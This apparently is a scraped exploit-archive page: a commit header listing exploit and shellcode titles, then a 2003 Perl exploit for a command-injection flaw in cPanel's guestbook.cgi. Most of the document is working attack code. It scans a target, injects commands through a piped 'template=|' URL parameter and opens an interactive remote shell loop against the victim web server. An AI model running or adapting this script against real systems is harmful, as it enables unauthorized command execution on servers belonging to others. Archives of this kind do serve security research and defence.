880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
199 lines
No EOL
5.4 KiB
Perl
Executable file
199 lines
No EOL
5.4 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/6882/info
|
|
|
|
A remote command execution vulnerability has been discovered in the cPanel CGI Application. This issue occurs due to insufficient sanitization of externally supplied data to the 'guestbook.cgi' script.
|
|
|
|
An attacker may exploit this vulnerability to execute commands in the security context of the web server hosting the affected script.
|
|
|
|
This vulnerability has been reported to affect cPanel version 5, previous versions may also be affected.
|
|
|
|
|
|
|
|
#####################################################
|
|
# cpanel-plus.pl exploit
|
|
# Spawn bash style Shell on Apache CPANEL
|
|
#
|
|
# Spabam 2003 PRIV8 code
|
|
#
|
|
# spax@zone-h.org
|
|
# This Script is currently under development
|
|
#####################################################
|
|
use strict;
|
|
use IO::Socket;
|
|
my $host;
|
|
my $port;
|
|
my $command;
|
|
my $url;
|
|
my @results;
|
|
my $probe;
|
|
my @U;
|
|
my $shit;
|
|
$U[1] = "/cgi-sys/guestbook.cgi?user=cpanel&template=|";
|
|
&intro;
|
|
&scan;
|
|
&choose;
|
|
&command;
|
|
&exit;
|
|
sub intro {
|
|
&help;
|
|
&host;
|
|
&server;
|
|
sleep 3;
|
|
};
|
|
sub host {
|
|
print "\nHost or IP : ";
|
|
$host=<STDIN>;
|
|
chomp $host;
|
|
if ($host eq ""){$host="127.0.0.1"};
|
|
#print "\nPort (enter to accept 80): ";
|
|
$shit="|";
|
|
$port="80";
|
|
chomp $port;
|
|
if ($port =~/\D/ ){$port="80"};
|
|
if ($port eq "" ) {$port = "80"};
|
|
};
|
|
sub server {
|
|
my $X;
|
|
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
|
|
#print "\nGet IIS string ...";
|
|
$probe = "string";
|
|
my $output;
|
|
my $webserver = "something";
|
|
&connect;
|
|
for ($X=0; $X<=10; $X++){
|
|
$output = $results[$X];
|
|
if (defined $output){
|
|
if ($output =~/IIS/){ $webserver = "iis" };
|
|
};
|
|
};
|
|
if ($webserver ne "iis"){
|
|
#print "\a\a\n\nWARNING : UNABLE TO GET IIS STRING.";
|
|
#print "\nThis Server may not be running Micro\$oft IIS WebServer";
|
|
#print "\n\n\nContinue anyway? ... [Y/N]";
|
|
my $choice = "y";
|
|
chomp $choice;
|
|
if ($choice =~/N/i) {&exit};
|
|
}else{
|
|
print "\n\nOK";
|
|
};
|
|
};
|
|
sub scan {
|
|
my $status = "not_vulnerable";
|
|
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
|
|
#print "\nScanning $host on port $port ...";
|
|
my $loop;
|
|
my $output;
|
|
my $flag;
|
|
$command="dir";
|
|
for ($loop=1; $loop < @U; $loop++) {
|
|
$flag = "0";
|
|
$url = $U[$loop];
|
|
$probe = "scan";
|
|
&connect;
|
|
foreach $output (@results){
|
|
if ($output =~ /Directory/) {
|
|
$flag = "1";
|
|
$status = "vulnerable";
|
|
};
|
|
};
|
|
if ($flag eq "0") {
|
|
#print "\nNo URL $loop...";
|
|
}else{
|
|
print "\a\a\a\n$host VULNERABLE TO URL $loop !!!";
|
|
};
|
|
};
|
|
if ($status eq "not_vulnerable"){
|
|
|
|
#"SORRY $host is NOT Vulnerable to this Exploit.";
|
|
};
|
|
};
|
|
sub choose {
|
|
#print "\nSelect a URL (type 0 to input)";
|
|
my $choice="0";
|
|
chomp $choice;
|
|
if ($choice > @U){ &choose };
|
|
if ($choice =~/\D/g ){ &choose };
|
|
if ($choice == 0){ &other };
|
|
$url = $U[$choice];
|
|
#print "\nURL: HTTP://$host$url";
|
|
};
|
|
sub other {
|
|
#print "\nURL [minus command] eg: HTTP://$host\/scripts\/cmd.exe?\/+";
|
|
#print "\nHTTP://$host";
|
|
my $other = "/cgi-sys/guestbook.cgi?user=cpanel&template=|";
|
|
chomp $other;
|
|
$U[0] = $other;
|
|
};
|
|
sub command {
|
|
while ($command !~/quit/i) {
|
|
#print "\nHELP QUIT URL SCAN Or Command eg dir C: ";
|
|
print "\n[$host]\$ ";
|
|
$command = <STDIN>;
|
|
chomp $command;
|
|
if ($command =~/quit/i) { &exit };
|
|
if ($command =~/url/i) { &choose };
|
|
if ($command =~/scan/i) { &scan };
|
|
if ($command =~/help/i) { &help };
|
|
$command =~ s/\s/+/g;
|
|
#print "HTTP://$host$url$command";
|
|
$probe = "command";
|
|
if ($command !~/quit|url|scan|help/) {&connect};
|
|
};
|
|
&exit;
|
|
};
|
|
sub connect {
|
|
my $connection = IO::Socket::INET->new (
|
|
Proto => "tcp",
|
|
PeerAddr => "$host",
|
|
PeerPort => "$port",
|
|
) or die "\nSorry UNABLE TO CONNECT To $host On Port $port.\n";
|
|
$connection -> autoflush(1);
|
|
if ($probe =~/command|scan/){
|
|
print $connection "GET $url$command$shiz HTTP/1.1\r\nHost: $host\r\n\r\n";
|
|
}elsif ($probe =~/string/) {
|
|
print $connection "HEAD / HTTP/1.1\r\nHost: $host\r\n\r\n";
|
|
};
|
|
|
|
while ( <$connection> ) {
|
|
@results = <$connection>;
|
|
};
|
|
close $connection;
|
|
if ($probe eq "command"){ &output };
|
|
if ($probe eq "string"){ &output };
|
|
};
|
|
sub output{
|
|
#print "\nOUTPUT FROM $host. \n\n";
|
|
my $display;
|
|
if ($probe eq "string") {
|
|
my $X;
|
|
for ($X=0; $X<=10; $X++) {
|
|
$display = $results[$X];
|
|
if (defined $display){print "$display";};
|
|
sleep 1;
|
|
};
|
|
}else{
|
|
foreach $display (@results){
|
|
print "$display";
|
|
sleep 1;
|
|
};
|
|
};
|
|
};
|
|
sub exit{
|
|
print "\n\n\n
|
|
SPABAM 2003.";
|
|
print "\nspabam.tk spax\@zone-h.org";
|
|
print "\n\n\n";
|
|
exit;
|
|
};
|
|
sub help {
|
|
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
|
|
print "\n
|
|
CPANEL-PLUS 1.1 by SPABAM spax 2003";
|
|
print "\n
|
|
";
|
|
print "\n A CPANEL EXPLOIT WHICH SPAWN A BASH STYLE SHELL";
|
|
print "\n
|
|
note.. web directory is normally /var/www/html";
|
|
print "\n";
|
|
print "\n Host: www.victim.com or xxx.xxx.xxx.xxx (RETURN for 127.0.0.1)";
|
|
print "\n\n\n\n\n\n\n\n\n\n\n\n";
|
|
}; |